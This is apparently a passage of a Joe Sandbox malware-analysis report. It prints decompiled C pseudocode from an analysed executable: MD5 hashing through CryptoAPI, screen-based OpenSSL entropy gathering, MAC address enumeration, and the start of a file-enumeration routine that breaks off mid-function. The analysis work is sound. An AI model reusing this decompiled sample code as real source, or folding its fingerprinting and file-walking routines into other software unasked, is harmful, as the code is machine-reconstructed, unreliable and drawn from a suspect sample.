API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 2d4dcd0d7d3653d701a1b7daed9a3677e3e53e3026fbfa424dd7847efa056b8b
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: 2d4dcd0d7d3653d701a1b7daed9a3677e3e53e3026fbfa424dd7847efa056b8b
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040E870(void* __ecx, void* __eflags, char _a4, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t48;
				int* _t49;
				char _t51;
				char _t53;
				char _t59;
				intOrPtr _t67;
				void* _t82;
				void* _t83;
				intOrPtr* _t89;
				void* _t94;
				void* _t95;
				int _t96;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t105;

				 *[fs:0x0] = _t102;
				_t103 = _t102 - 0x38;
				_v20 = _t103;
				_t83 = __ecx;
				_v8 = 0;
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				E004156D0(__ecx, __ecx, _t95, 0x4ffca4);
				_t48 =  &_v32;
				_v8 = 1;
				__imp__CryptAcquireContextW(_t48, 0, 0, 1, 0xf0000000, 0, _t95, _t98, _t82,  *[fs:0x0], 0x4ca9e8, 0xffffffff);
				if(_t48 == 0) {
					_v40 = _t48;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t49 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t49);
				if(_t49 == 0) {
					_v44 = _t49;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t51 =  >=  ? _a4 :  &_a4;
				__imp__CryptHashData(_v24, _t51, _a20, 0);
				if(_t51 == 0) {
					_v48 = _t51;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t99 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t53 =  *_t99(_v24, 2, 0,  &_v28, 0);
				_t113 = _t53;
				if(_t53 == 0) {
					_v52 = _t53;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t96 = E00420BE4(_t83, _t95, _t113, _v28 + 1);
				_v36 = _t96;
				E0042B420(_t96, 0, _v28 + 1);
				_t105 = _t103 + 0x10;
				_t59 =  *_t99(_v24, 2, _t96,  &_v28, 0);
				if(_t59 == 0) {
					_v56 = _t59;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t100 = 0;
				while(_t100 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t100 + _t96) & 0x000000ff);
					_t105 = _t105 + 0xc;
					if(_v72 != 0) {
						_t89 =  &_v72;
						_t39 = _t89 + 1; // 0x1
						_t94 = _t39;
						do {
							_t67 =  *_t89;
							_t89 = _t89 + 1;
							__eflags = _t67;
						} while (_t67 != 0);
						_push(_t89 - _t94);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					} else {
						_push(0);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					}
					L20:
				}
				E00422110(_t96);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				__eflags = _a24 - 0x10;
				if(_a24 >= 0x10) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return 1;
				goto L20;
			}

0x0040e881
0x0040e888
0x0040e88e
0x0040e891
0x0040e895
0x0040e8a1
0x0040e8a8
0x0040e8af
0x0040e8b6
0x0040e8c6
0x0040e8c9
0x0040e8ce
0x0040e8d6
0x0040e8d8
0x0040e8e4
0x0040e8e4
0x0040e8e9
0x0040e8f9
0x0040e901
0x0040e903
0x0040e90f
0x0040e90f
0x0040e920
0x0040e928
0x0040e930
0x0040e932
0x0040e93e
0x0040e93e
0x0040e943
0x0040e956
0x0040e95d
0x0040e95f
0x0040e961
0x0040e963
0x0040e96f
0x0040e96f
0x0040e985
0x0040e987
0x0040e98e
0x0040e993
0x0040e9a2
0x0040e9a6
0x0040e9a8
0x0040e9b4
0x0040e9b4
0x0040e9b9
0x0040e9c0
0x0040e9d3
0x0040e9d8
0x0040e9df
0x0040e9f2
0x0040e9f5
0x0040e9f5
0x0040e9f8
0x0040e9f8
0x0040e9fa
0x0040e9fb
0x0040e9fb
0x0040ea04
0x0040ea08
0x0040ea0d
0x0040e9e1
0x0040e9e6
0x0040e9ea
0x0040e9ef
0x0040e9ef
0x00000000
0x0040e9df
0x0040ea11
0x0040ea1c
0x0040ea27
0x0040ea2d
0x0040ea31
0x0040ea36
0x0040ea3b
0x0040ea43
0x0040ea50
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: e751219a71e2b7e2c83dd52f72c8bfe88636bf0333f1cf93ebe6a8a84750a1e8
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: e751219a71e2b7e2c83dd52f72c8bfe88636bf0333f1cf93ebe6a8a84750a1e8
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040EAA0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t42;
				int* _t43;
				char _t45;
				char _t51;
				intOrPtr _t58;
				void* _t72;
				intOrPtr* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				int _t89;
				void* _t91;
				void* _t92;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t99;

				 *[fs:0x0] = _t96;
				_t97 = _t96 - 0x38;
				_t73 = _a4;
				_v20 = _t97;
				_t88 = __ecx;
				_v32 = 0;
				_t92 = __edx;
				_v24 = 0;
				_v36 = 0;
				E004156D0(_a4, _t73, __ecx, 0x4ffca4);
				_t42 =  &_v32;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000, 0, _t87, _t91, _t72,  *[fs:0x0], 0x4caa00, 0xffffffff);
				if(_t42 == 0) {
					_v40 = _t42;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t43 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t43);
				if(_t43 == 0) {
					_v44 = _t43;
					_t43 = E00430ECA( &_v44, 0x5085b8);
				}
				__imp__CryptHashData(_v24, _t88, _t92, 0);
				if(_t43 == 0) {
					_v48 = _t43;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t93 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t45 =  *_t93(_v24, 2, 0,  &_v28, 0);
				_t105 = _t45;
				if(_t45 == 0) {
					_v52 = _t45;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t89 = E00420BE4(_t73, _t88, _t105, _v28 + 1);
				_v36 = _t89;
				E0042B420(_t89, 0, _v28 + 1);
				_t99 = _t97 + 0x10;
				_t51 =  *_t93(_v24, 2, _t89,  &_v28, 0);
				if(_t51 == 0) {
					_v56 = _t51;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t94 = 0;
				while(_t94 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t94 + _t89) & 0x000000ff);
					_t99 = _t99 + 0xc;
					if(_v72 != 0) {
						_t80 =  &_v72;
						_t35 = _t80 + 1; // 0x1
						_t86 = _t35;
						do {
							_t58 =  *_t80;
							_t80 = _t80 + 1;
							__eflags = _t58;
						} while (_t58 != 0);
						_push(_t80 - _t86);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					} else {
						_push(0);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					}
					L18:
				}
				E00422110(_t89);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
				goto L18;
			}

0x0040eab1
0x0040eab8
0x0040eabc
0x0040eac1
0x0040eac4
0x0040eacf
0x0040ead6
0x0040ead8
0x0040eadf
0x0040eae6
0x0040eaf6
0x0040eaf9
0x0040eb01
0x0040eb09
0x0040eb0b
0x0040eb17
0x0040eb17
0x0040eb1c
0x0040eb2c
0x0040eb34
0x0040eb36
0x0040eb42
0x0040eb42
0x0040eb4e
0x0040eb56
0x0040eb58
0x0040eb64
0x0040eb64
0x0040eb69
0x0040eb7c
0x0040eb83
0x0040eb85
0x0040eb87
0x0040eb89
0x0040eb95
0x0040eb95
0x0040ebab
0x0040ebad
0x0040ebb4
0x0040ebb9
0x0040ebc8
0x0040ebcc
0x0040ebce
0x0040ebda
0x0040ebda
0x0040ebdf
0x0040ebe1
0x0040ebf4
0x0040ebf9
0x0040ec00
0x0040ec13
0x0040ec16
0x0040ec16
0x0040ec20
0x0040ec20
0x0040ec22
0x0040ec23
0x0040ec23
0x0040ec2c
0x0040ec30
0x0040ec35
0x0040ec02
0x0040ec07
0x0040ec0b
0x0040ec10
0x0040ec10
0x00000000
0x0040ec00
0x0040ec39
0x0040ec44
0x0040ec4f
0x0040ec5a
0x0040ec67
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127
windowCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E004822E0(void* __edx, void* __eflags, void* _a4, void _a8, signed short _a12, int _a16, struct HDC__* _a24, signed int _a108) {
				void* _v8;
				int _v16;
				char _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v44;
				struct HBITMAP__* _v48;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t27;
				void* _t58;
				void* _t59;
				struct HDC__* _t60;
				long _t63;
				struct HDC__* _t64;
				void* _t67;
				void* _t69;
				struct HDC__* _t70;
				void* _t71;
				void* _t73;
				void* _t75;
				int _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_t67 = __edx;
				_t80 = _t79 & 0xffffffc0;
				E0042F7C0(0x74);
				_t27 =  *0x50ad20; // 0x727261cc
				_a108 = _t27 ^ _t80;
				_push(_t58);
				if(E004549A0(_t58) <= 0) {
					_t70 = CreateDCA("DISPLAY", 0, 0, 0);
					_a24 = _t70;
					_t60 = CreateCompatibleDC(_t70);
					_a24 = _t60;
					_a24 = GetDeviceCaps(_t70, 8);
					_a12 = GetDeviceCaps(_t70, 0xa);
					_t75 = CreateCompatibleBitmap(_t70, _a16, 0x10);
					_a8 = _t75;
					_a4 = SelectObject(_t60, _t75);
					GetObjectA(_t75, 0x18,  &_a8);
					_t63 = (_a12 & 0x0000ffff) * _a4 * _a8;
					_t71 = E00454E50(_t63, ".\\crypto\\rand\\rand_win.c", 0x306);
					_t80 = _t80 + 0xc;
					if(_t71 != 0) {
						_t77 = 0;
						_t85 = _v20 + 0xfffffff0;
						if(_v20 + 0xfffffff0 > 0) {
							do {
								BitBlt(_v24, 0, 0, _v16, 0x10, _v28, 0, _t77, 0xcc0020);
								GetBitmapBits(_v48, _t63, _t71);
								_push(0);
								_push(E00479F90());
								_push(0);
								_push( &_v28);
								_push(_t63);
								_push(_t71);
								E00480550(_t63, _t67, _t71, _t78, _t85);
								E0042F7C0(8);
								asm("xorps xmm0, xmm0");
								asm("movsd [esp], xmm0");
								E0045D550(_t63, _t71, _t77, _t78,  &_v20, 0x14);
								_t77 = _t77 + 0x10;
								_t80 = _t80 + 0x28;
							} while (_t77 < _v60 + 0xfffffff0);
						}
						E00454C70(_t71);
						_t80 = _t80 + 4;
					}
					_t64 = _v24;
					DeleteObject(SelectObject(_t64, _v8));
					DeleteDC(_t64);
					DeleteDC(_v44);
				}
				_pop(_t69);
				_pop(_t73);
				_pop(_t59);
				return E0042A77E(_t59, _a108 ^ _t80, _t67, _t69, _t73);
			}

0x004822e0
0x004822e3
0x004822eb
0x004822f0
0x004822f7
0x004822fb
0x00482305
0x0048231c
0x0048231f
0x0048232f
0x00482334
0x0048233d
0x00482349
0x00482354
0x00482358
0x00482362
0x0048236e
0x00482388
0x00482393
0x00482395
0x0048239a
0x004823a4
0x004823a9
0x004823ab
0x004823b0
0x004823ca
0x004823d6
0x004823dc
0x004823e3
0x004823e4
0x004823ea
0x004823eb
0x004823ec
0x004823ed
0x004823fa
0x004823ff
0x00482406
0x0048240e
0x00482417
0x0048241d
0x00482420
0x004823b0
0x00482425
0x0048242a
0x0048242a
0x00482431
0x0048243d
0x0048244a
0x00482450
0x00482450
0x00482456
0x00482457
0x00482458
0x00482463

APIs

Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
CreateCompatibleDC.GDI32(00000000), ref: 00482323
GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
SelectObject.GDI32(00000000,00000000), ref: 0048235C
GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
SelectObject.GDI32(?,?), ref: 00482436
DeleteObject.GDI32(00000000), ref: 0048243D
DeleteDC.GDI32(?), ref: 0048244A
DeleteDC.GDI32(?), ref: 00482450

Strings

DISPLAY, xrefs: 00482311
.\crypto\rand\rand_win.c, xrefs: 00482383

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: .\crypto\rand\rand_win.c$DISPLAY
API String ID: 151064509-1805842116
Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E670(void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t14;
				char* _t15;
				void* _t35;
				void* _t36;
				void* _t37;
				char* _t41;
				void* _t44;
				void* _t45;

				_t33 = __ebx;
				_push(_t36);
				_v8 = 0x288;
				_t37 = E00420C62(__ebx, _t35, _t36, 0x12);
				_t41 = E00420C62(__ebx, _t35, _t37, 0x288);
				_t45 = _t44 + 8;
				_t49 = _t41;
				if(_t41 != 0) {
					_t14 =  &_v8;
					__imp__GetAdaptersInfo(_t41, _t14);
					__eflags = _t14 - 0x6f;
					if(_t14 != 0x6f) {
						L4:
						_t15 =  &_v8;
						__imp__GetAdaptersInfo(_t41, _t15);
						__eflags = _t15;
						if(_t15 == 0) {
							_push( *(_t41 + 0x199) & 0x000000ff);
							_push( *(_t41 + 0x198) & 0x000000ff);
							_push( *(_t41 + 0x197) & 0x000000ff);
							_push( *(_t41 + 0x196) & 0x000000ff);
							_push( *(_t41 + 0x195) & 0x000000ff);
							E004204A6(_t37, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t41 + 0x194) & 0x000000ff);
							_push(_t37);
							_t11 = _t41 + 0x1b0; // 0x1b0
							_push("Address: %s, mac: %s\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_push("\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_t45 = _t45 + 0x30;
						}
						E00420BED(_t41);
						return _t37;
					} else {
						E00420BED(_t41);
						_t41 = E00420C62(_t33, _t35, _t37, _v8);
						_t45 = _t45 + 8;
						__eflags = _t41;
						if(__eflags == 0) {
							goto L1;
						} else {
							goto L4;
						}
					}
				} else {
					L1:
					_push("Error allocating memory needed to call GetAdaptersinfo\n");
					E00421F2D(_t33, _t37, _t41, _t49);
					E00420BED(_t37);
					return 0;
				}
			}

0x0040e670
0x0040e675
0x0040e678
0x0040e689
0x0040e690
0x0040e692
0x0040e695
0x0040e697
0x0040e6b4
0x0040e6b9
0x0040e6bf
0x0040e6c2
0x0040e6db
0x0040e6db
0x0040e6e0
0x0040e6e6
0x0040e6e8
0x0040e6f1
0x0040e6f9
0x0040e701
0x0040e709
0x0040e711
0x0040e720
0x0040e725
0x0040e726
0x0040e72d
0x0040e732
0x0040e737
0x0040e73c
0x0040e741
0x0040e741
0x0040e745
0x0040e754
0x0040e6c4
0x0040e6c5
0x0040e6d2
0x0040e6d4
0x0040e6d7
0x0040e6d9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e6d9
0x0040e699
0x0040e699
0x0040e699
0x0040e69e
0x0040e6a4
0x0040e6b3
0x0040e6b3

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
Address: %s, mac: %s, xrefs: 0040E72D
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Uniqueness

Uniqueness Score: -1.00%

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00410160(intOrPtr __ecx, intOrPtr* __edx, char _a4, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				char _v96;
				signed int _v100;
				signed int _v104;
				WCHAR* _v108;
				short _v120;
				signed int _v124;
				signed int _v128;
				char _v144;
				intOrPtr* _v148;
				struct _WIN32_FIND_DATAW _v740;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t270;
				intOrPtr _t280;
				WCHAR* _t288;
				short _t291;
				signed int _t293;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				intOrPtr _t303;
				WCHAR* _t308;
				void* _t309;
				void* _t313;
				void* _t330;
				signed int _t334;
				WCHAR* _t335;
				WCHAR* _t346;
				WCHAR* _t348;
				void* _t405;
				void* _t411;
				intOrPtr _t413;
				intOrPtr _t414;
				void* _t415;
				intOrPtr* _t418;
				signed int _t420;
				intOrPtr* _t423;
				signed int _t425;
				char* _t431;
				char* _t432;
				intOrPtr* _t434;
				signed int _t436;
				intOrPtr* _t439;
				intOrPtr* _t441;
				short* _t445;
				short* _t447;
				signed int _t450;
				signed int _t453;
				WCHAR* _t454;
				short* _t455;
				signed int _t460;
				intOrPtr* _t468;
				void* _t470;
				void* _t471;
				void* _t472;
				intOrPtr _t475;
				intOrPtr _t476;
				signed int _t477;
				signed int _t480;
				void* _t481;
				void* _t482;
				WCHAR* _t484;
				intOrPtr _t490;
				signed int* _t491;
				void* _t492;
				WCHAR* _t494;
				short _t495;
				intOrPtr _t496;
				void* _t497;
				void* _t498;
				short* _t501;
				short* _t502;
				void* _t503;
				short* _t504;

				_push(0xffffffff);
				_push(0x4cab68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t496;
				_t497 = _t496 - 0x2d4;
				_t410 = __edx;
				_v72 = __ecx;
				_v148 = __edx;
				_v8 = 0;
				E00411AB0();
				_t480 = 0;
				_t490 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v68 = _t490;
				if(_t490 == 0) {
					L15:
					_v76 = 7;
					_v80 = 0;
					_v96 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_v44 = 7;
					 *((intOrPtr*)(_v72 + 0x8bc)) = 1;
					_push(0);
					_v64 = 0;
					_v48 = 0;
					E00414690(_t410,  &_v64,  &_a4);
					_v8 = 4;
					_t411 = PathFindFileNameW;
					_t267 =  >=  ? _v64 :  &_v64;
					_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
					_v20 = 7;
					_v24 = 0;
					_v40 = 0;
					if( *_t468 != 0) {
						_t418 = _t468;
						_t79 = _t418 + 2; // 0x2
						_t490 = _t79;
						do {
							_t270 =  *_t418;
							_t418 = _t418 + 2;
						} while (_t270 != 0);
						_t420 = _t418 - _t490 >> 1;
						L24:
						_push(_t420);
						E00415C10(_t411,  &_v40, _t480, _t490, _t468);
						_v8 = 5;
						_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
						if( &_v64 != _t491) {
							if(_v44 >= 8) {
								L00422587(_v64);
								_t497 = _t497 + 4;
							}
							_v44 = 7;
							_v48 = 0;
							_v64 = 0;
							if(_t491[5] >= 8) {
								_v64 =  *_t491;
								 *_t491 = 0;
							} else {
								_t384 = _t491[4] + 1;
								if(_t491[4] + 1 != 0) {
									E004205A0( &_v64, _t491, _t384 + _t384);
									_t497 = _t497 + 0xc;
								}
							}
							_v48 = _t491[4];
							_v44 = _t491[5];
							_t491[5] = 7;
							_t491[4] = 0;
							 *_t491 = 0;
						}
						if(_v124 >= 8) {
							L00422587(_v144);
							_t497 = _t497 + 4;
						}
						_t481 = 0;
						while(_v48 != 0 || _v24 != 0) {
							_t481 = _t481 + 1;
							_t278 =  >=  ? _v64 :  &_v64;
							_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
							if( *_t468 != 0) {
								_t423 = _t468;
								_t109 = _t423 + 2; // 0x2
								_t491 = _t109;
								do {
									_t280 =  *_t423;
